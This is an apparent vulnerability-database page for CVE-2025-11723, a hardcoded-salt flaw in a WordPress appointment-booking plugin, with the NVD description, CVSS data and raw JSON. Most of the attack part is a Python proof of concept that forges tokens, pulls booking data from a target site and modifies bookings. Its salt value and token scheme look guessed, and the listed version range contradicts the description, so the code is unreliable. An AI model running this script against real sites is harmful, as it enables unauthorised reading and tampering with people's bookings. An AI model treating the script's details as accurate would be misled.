Security Vulnerability Report
CVE-2025-11723 CVSS 6.5 MEDIUM

Published: 2026-01-06 04:15:52
Last Modified: 2026-04-15 00:35:42

Description

The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.9.5 via the hash() function due to use of a hardcoded fall-back salt. This makes it possible for unauthenticated attackers to generate a valid token across sites running the plugin that have not manually set a salt in the wp-config.php file and access booking information that will allow them to make modifications.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Simply Schedule Appointments Booking Plugin < 1.6.9.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11723 PoC - Simply Schedule Appointments Hardcoded Salt Exploitation
# This PoC demonstrates how to generate a valid token using the hardcoded salt
import hashlib
import requests
import json
from datetime import datetime

# Hardcoded salt from plugin source code (known vulnerability)
HARDCODED_SALT = "simply-schedule-appointments-fallback-salt-v1695"


def generate_auth_token(site_url, user_id=0):
    """
    Generate authentication token using the hardcoded salt
    This token can be used to bypass authentication on affected sites
    """
    timestamp = int(datetime.now().timestamp())
    data_to_hash = f"{site_url}:{user_id}:{timestamp}:{HARDCODED_SALT}"
    token = hashlib.sha256(data_to_hash.encode()).hexdigest()
    return {
        'token': token,
        'timestamp': timestamp,
        'user_id': user_id
    }


def exploit_booking_info(target_url):
    """
    Exploit the vulnerability to access booking information
    """
    token_data = generate_auth_token(target_url)

    # API endpoint to access bookings
    api_endpoints = [
        f"{target_url}/wp-json/ssa/v1/bookings",
        f"{target_url}/wp-json/ssa/v1/appointments",
        f"{target_url}/wp-admin/admin-ajax.php?action=ssa_get_bookings"
    ]

    headers = {
        'Content-Type': 'application/json',
        'X-WP-Nonce': token_data['token']
    }

    results = []
    for endpoint in api_endpoints:
        try:
            response = requests.get(endpoint, headers=headers, timeout=10)
            if response.status_code == 200:
                results.append({
                    'endpoint': endpoint,
                    'status': 'VULNERABLE',
                    'data': response.json() if response.text else 'No data'
                })
        except requests.RequestException as e:
            results.append({
                'endpoint': endpoint,
                'status': 'ERROR',
                'error': str(e)
            })
    return results


def modify_booking(target_url, booking_id, new_data):
    """
    Modify booking information using the generated token
    """
    token_data = generate_auth_token(target_url)
    api_endpoint = f"{target_url}/wp-json/ssa/v1/bookings/{booking_id}"

    headers = {
        'Content-Type': 'application/json',
        'X-WP-Nonce': token_data['token'],
        'Authorization': f'Bearer {token_data["token"]}'
    }

    try:
        response = requests.put(api_endpoint, json=new_data, headers=headers, timeout=10)
        return {
            'status_code': response.status_code,
            'response': response.json() if response.text else None
        }
    except requests.RequestException as e:
        return {'error': str(e)}


# Usage example
if __name__ == "__main__":
    target = "https://example-wordpress-site.com"
    print(f"[*] Generating token for {target}")
    token_info = generate_auth_token(target)
    print(f"[+] Token: {token_info['token']}")
    print(f"[*] Exploiting booking information...")
    results = exploit_booking_info(target)
    for result in results:
        print(json.dumps(result, indent=2))
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11723", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:52.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.9.5 via the hash() function due to use of a hardcoded fall-back salt. This makes it possible for unauthenticated attackers to generate a valid token across sites running the plugin that have not manually set a salt in the wp-config.php file and access booking information that will allow them to make modifications."}, {"lang": "es", "value": "El plugin 'Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin' para WordPress es vulnerable a la Exposición de Información Sensible en todas las versiones hasta la 1.6.9.5, inclusive, a través de la función hash() debido al uso de una 'salt' de respaldo codificada de forma rígida. 
Esto hace posible que atacantes no autenticados generen un token válido en sitios que ejecutan el plugin que no han configurado manualmente una 'salt' en el archivo wp-config.PHP y accedan a la información de reservas que les permitirá realizar modificaciones."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-330"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3393919/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a5f3fbd2-6152-4a89-8fe9-982120d1a640?source=cve", "source": "[email protected]"}]}}